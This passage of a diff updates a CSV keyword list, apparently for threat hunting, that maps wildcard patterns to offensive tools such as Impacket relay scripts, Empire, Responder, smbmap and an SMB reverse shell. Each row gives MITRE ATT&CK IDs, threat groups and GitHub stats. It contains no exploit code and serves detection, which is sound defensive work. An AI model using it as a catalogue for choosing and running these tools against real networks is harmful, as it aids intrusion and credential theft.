and is intended to simplify searching for potentially sensitive data across large networks.","T1210.001 - T1083 - T1213 - T1021","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Information Gathering","https://github.com/ShawnDEvans/smbmap","1","0","N/A","10","10","1554","344","2023-09-14T20:51:52Z","2015-03-16T13:15:00Z" -"*smbmapDump*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1384","210","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" -"*smbmap-master*","offensive_tool_keyword","smbmap","SMBMap allows users to enumerate samba share drives across an entire domain. List share drives. drive permissions. share contents. upload/download functionality. file name auto-download pattern matching. and even execute remote commands. This tool was designed with pen testing in mind. and is intended to simplify searching for potentially sensitive data across large networks.","T1210.001 - T1083 - T1213 - T1021","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Information Gathering","https://github.com/ShawnDEvans/smbmap","1","1","N/A","10","10","1554","344","2023-09-14T20:51:52Z","2015-03-16T13:15:00Z" -"*SMBNTLMChallenge*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Invoke-InveighRelay.ps1","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*SMBNTLMChallenge*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*SMBNTLMResponse*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*smbmap.py *","offensive_tool_keyword","smbmap","SMBMap allows users to enumerate samba share drives across an entire domain. List share drives. drive permissions. share contents. upload/download functionality. file name auto-download pattern matching. and even execute remote commands. This tool was designed with pen testing in mind. 
and is intended to simplify searching for potentially sensitive data across large networks.","T1210.001 - T1083 - T1213 - T1021","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Information Gathering","https://github.com/ShawnDEvans/smbmap","1","1","N/A","10","10","1555","344","2023-09-14T20:51:52Z","2015-03-16T13:15:00Z" +"*smbmap.smbmap*","offensive_tool_keyword","smbmap","SMBMap allows users to enumerate samba share drives across an entire domain. List share drives. drive permissions. share contents. upload/download functionality. file name auto-download pattern matching. and even execute remote commands. This tool was designed with pen testing in mind. and is intended to simplify searching for potentially sensitive data across large networks.","T1210.001 - T1083 - T1213 - T1021","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Information Gathering","https://github.com/ShawnDEvans/smbmap","1","0","N/A","10","10","1555","344","2023-09-14T20:51:52Z","2015-03-16T13:15:00Z" +"*smbmapDump*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*smbmap-master*","offensive_tool_keyword","smbmap","SMBMap allows users to enumerate samba share drives across an entire domain. List share drives. drive permissions. share contents. upload/download functionality. file name auto-download pattern matching. and even execute remote commands. This tool was designed with pen testing in mind. 
and is intended to simplify searching for potentially sensitive data across large networks.","T1210.001 - T1083 - T1213 - T1021","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Information Gathering","https://github.com/ShawnDEvans/smbmap","1","1","N/A","10","10","1555","344","2023-09-14T20:51:52Z","2015-03-16T13:15:00Z" +"*SMBNTLMChallenge*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Invoke-InveighRelay.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" 
+"*SMBNTLMChallenge*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*SMBNTLMResponse*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*smbpasswd.py -newpass *","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" -"*smbpasswd.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11786","3291","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" -"*SMBRelay.py*","offensive_tool_keyword","responder","LLMNR. NBT-NS and MDNS poisoner","T1557.001 - T1171 - T1547.011","TA0011 - TA0005 - TA0003","N/A","N/A","Sniffing & Spoofing","https://github.com/SpiderLabs/Responder","1","1","N/A","N/A","10","4198","1633","2020-06-15T18:07:44Z","2012-10-24T14:35:12Z" -"*SMBRelayChallenge*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Invoke-InveighRelay.ps1","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*smbpasswd.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*SMBRelay.py*","offensive_tool_keyword","responder","LLMNR. NBT-NS and MDNS poisoner","T1557.001 - T1171 - T1547.011","TA0011 - TA0005 - TA0003","N/A","N/A","Sniffing & Spoofing","https://github.com/SpiderLabs/Responder","1","1","N/A","N/A","10","4199","1633","2020-06-15T18:07:44Z","2012-10-24T14:35:12Z" +"*SMBRelayChallenge*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Invoke-InveighRelay.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*smbrelayclient.py*","offensive_tool_keyword","cobaltstrike","Beacon Object File (BOF) to obtain a usable TGT for the current user and does not require elevated privileges on the host","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - 
T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/connormcgarr/tgtdelegation","1","1","N/A","10","10","128","21","2021-11-26T16:45:05Z","2021-11-22T18:42:57Z" -"*smbrelayclient.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11786","3291","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" -"*SMBRelayResponse*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Invoke-InveighRelay.ps1","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*smbrelayclient.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*SMBRelayResponse*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - 
","Frameworks","https://github.com/EmpireProject/Empire","1","1","Invoke-InveighRelay.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*smbrelayserver.*","offensive_tool_keyword","cobaltstrike","Beacon Object File (BOF) to obtain a usable TGT for the current user and does not require elevated privileges on the host","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/connormcgarr/tgtdelegation","1","1","N/A","10","10","128","21","2021-11-26T16:45:05Z","2021-11-22T18:42:57Z" -"*smbrelayserver.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11786","3291","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" -"*smbrelayx.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11786","3291","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*smbrelayserver.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*smbrelayx.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" "*smb-reverse-shell.git*","offensive_tool_keyword","smb-reverse-shell","A Reverse Shell which uses an XML file on an SMB share as a communication channel.","T1021.002 - T1027 - T1105","TA0008 - TA0010 - TA0002","N/A","N/A","C2","https://github.com/r1cksec/smb-reverse-shell","1","1","N/A","10","10","9","0","2022-07-31T10:05:53Z","2022-01-16T21:02:14Z" "*smb-reverse-shell-main*","offensive_tool_keyword","smb-reverse-shell","A Reverse Shell which uses an XML file on an SMB share as a communication channel.","T1021.002 - T1027 - T1105","TA0008 - TA0010 - TA0002","N/A","N/A","C2","https://github.com/r1cksec/smb-reverse-shell","1","1","N/A","10","10","9","0","2022-07-31T10:05:53Z","2022-01-16T21:02:14Z" 